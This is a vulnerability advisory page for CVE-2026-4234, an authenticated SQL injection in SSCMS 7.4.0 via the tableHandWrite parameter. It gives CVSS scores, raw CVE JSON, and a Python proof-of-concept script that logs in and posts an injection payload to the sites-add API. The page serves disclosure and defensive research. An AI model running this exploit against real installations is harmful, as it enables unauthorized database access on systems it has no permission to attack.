Security Vulnerability Report
CVE-2026-4234 CVSS 6.3 MEDIUM

CVE-2026-4234

Published: 2026-03-16 14:20:17
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in SSCMS 7.4.0. This vulnerability affects unknown code of the file SitesAddController.Submit.cs of the component DDL Handler. The manipulation of the argument tableHandWrite results in SQL injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SSCMS 7.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2026-4234 SSCMS SQL Injection PoC
# Target: SSCMS 7.4.0 SitesAddController DDL Handler


def exploit_sqli(target_url, username, password, injection_payload):
    """
    Exploit SQL injection in SSCMS 7.4.0

    target_url: Base URL of SSCMS installation
    username: Valid low-privilege user
    password: User password
    injection_payload: SQL injection payload for tableHandWrite parameter
    """
    login_url = f"{target_url}/api/login"
    sites_add_url = f"{target_url}/api/sitesAdd/submit"

    # Step 1: Authenticate
    session = requests.Session()
    login_data = {
        "username": username,
        "password": password
    }

    try:
        login_response = session.post(login_url, json=login_data, timeout=10)
        if login_response.status_code != 200:
            print("[-] Authentication failed")
            return None
        print("[+] Authentication successful")

        # Step 2: Exploit SQL injection
        exploit_data = {
            "tableHandWrite": injection_payload,
            "siteName": "TestSite",
            "siteDir": "test"
        }
        exploit_response = session.post(sites_add_url, json=exploit_data, timeout=10)
        return exploit_response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


# Example payloads
if __name__ == "__main__":
    # Three arguments are required, so argv must hold at least four entries
    if len(sys.argv) < 4:
        print("Usage: python cve-2026-4234.py <target_url> <username> <password>")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]

    # Basic SQL injection test payload
    payload = "test' OR '1'='1"

    print(f"[*] Exploiting CVE-2026-4234 on {target}")
    result = exploit_sqli(target, user, pwd, payload)
    if result:
        print(f"[+] Response: {result}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4234", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:17.463", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in SSCMS 7.4.0. This vulnerability affects unknown code of the file SitesAddController.Submit.cs of the component DDL Handler. The manipulation of the argument tableHandWrite results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha descubierto una falla de seguridad en SSCMS 7.4.0. Esta vulnerabilidad afecta a código desconocido del archivo SitesAddController.Submit.cs del componente DDL Gestor. La manipulación del argumento tableHandWrite resulta en inyección SQL. El ataque puede ser ejecutado remotamente. El exploit ha sido publicado y puede ser utilizado para ataques. 
Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", 
"confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://vuldb.com/?ctiid.351157", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351157", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771238", "source": "[email protected]"}, {"url": "https://www.yuque.com/la12138/pa2fpb/uzhex80ydgktvzok?singleDoc", "source": "[email protected]"}]}}